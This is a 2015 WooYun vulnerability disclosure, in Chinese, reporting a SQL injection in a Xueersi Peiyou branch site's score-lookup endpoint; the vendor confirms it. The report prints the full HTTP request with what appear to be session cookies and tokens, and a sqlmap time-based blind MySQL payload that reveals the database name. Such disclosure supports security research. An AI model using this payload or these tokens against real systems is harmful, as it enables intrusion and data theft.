当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125277

漏洞标题:学而思培优分站存在SQL注入漏洞

相关厂商:好未来集团学而思培优

漏洞作者: missy

提交时间:2015-07-08 09:47

修复时间:2015-08-23 19:18

公开时间:2015-08-23 19:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

详细说明:

上个事件中曾报过另一个分站的问题,发现这个SQL注入都是发生在同一个位置,多个分站应该都会存在其问题。

注入点:
POST /Students/getScore/ HTTP/1.1
Host: sbj.speiyou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://sbj.speiyou.com/Students/getScore
Cookie: __utma=190819817.287472353.1436276128.1436281125.1436284214.3; __utmz=190819817.1436276128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436276128,1436281125; __utmc=190819817; Hm_lpvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436284223; CAKEPHP=ermfclsmpfekhojqku5457id90; lastact=http%3A%2F%2Fsbj.speiyou.com%2FStudents%2Findex; BIGipServerPY_Web-YouHua_Pool=1997318336.20480.0000; jfs=http%3A//sbj.speiyou.com/shouye/; Hm_lvt_bc32c5daddabcf51a91b42068054117d=1436284158; Hm_lpvt_bc32c5daddabcf51a91b42068054117d=1436284252; CakeCookie[XESCAS][Cas]=W%19%D8Xth%E6q%B3%A4%90E%1D%80%B5%07%7Beo%B8%C9%0Db%09%5DyD%A8%81%8A%B4%CA%ADM%C6%B1M%C2T%BAL%E5%E2%9B%7E%D4%C30%F6%3EA__%EE%C6%05H%FC%F9%A1%8Ae%19%BA%DA%9E%A3X%28%83R%E0%BB%EE2%C8%CEr%29%0FV%F9%B88%90%08%DB%C4%7C%12%FC%D2%00%93%24%BB%CD%40+y%D7%AC%22%D2%40%5E%1Ef%E3%C0%A0%5D%F7%83%13W%857%5DY%CDc%3A%C0%A8%85%1F%5D%C0%D2%84%FE%3F%60%D7%98%93%87%97s%0A%7Eqs; Hm_lvt_9d97af10d05de971ff7e7280467a8f58=1436284210; Hm_lpvt_9d97af10d05de971ff7e7280467a8f58=1436284221; XESCAS[tk]=ZUdWekxUVTBhMkkwT1hWc2JXbDBiR3R4TTJkdWFqYzFhVFJ4TlRFMQ; __utmb=190819817.2.10.1436284214; __utmt=1; stoken=ZUdWekxUVTBhMkkwT1hWc2JXbDBiR3R4TTJkdWFqYzFhVFJ4TlRFMQ; newstoken=ZUdWekxUVTBhMkkwT1hWc2JXbDBiR3R4TTJkdWFqYzFhVFJ4TlRFMQ; Hm_lvt_bbcf414eff5e373d6608c2842ef99468=1436284226; Hm_lpvt_bbcf414eff5e373d6608c2842ef99468=1436284226; looyu_id=32764eae226f9d768c4de300752d2ad9ca_31691%3A1; looyu_31691=v%3A32764eae226f9d768c4de300752d2ad9ca%2Cref%3A%2Cr%3A%2Cmon%3Ahttp%3A//m141.looyu.com/monitor; B_cookie_login_status=ok
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
year=2013&grade=1&subject=ff80808127d77caa0127d7e13be500c6&recommend=qmcs&paperName=11&button=%E6%9F%A5%E8%AF%A2


1.jpg


2.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: year (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: year=2013' AND (SELECT * FROM (SELECT(SLEEP(5)))Soym) AND 'sdDF'='sdDF&grade=1&subject=ff80808127d77caa0127d7e13be500c6&recommend=qmcs&paperName=11&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0.12
current database:    'py_rxcs'

漏洞证明:

修复方案:

过滤相关参数

版权声明:转载请注明来源 missy@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-09 19:18

厂商回复:

谢谢,修复中

最新状态:

暂无

漏洞评价:

评论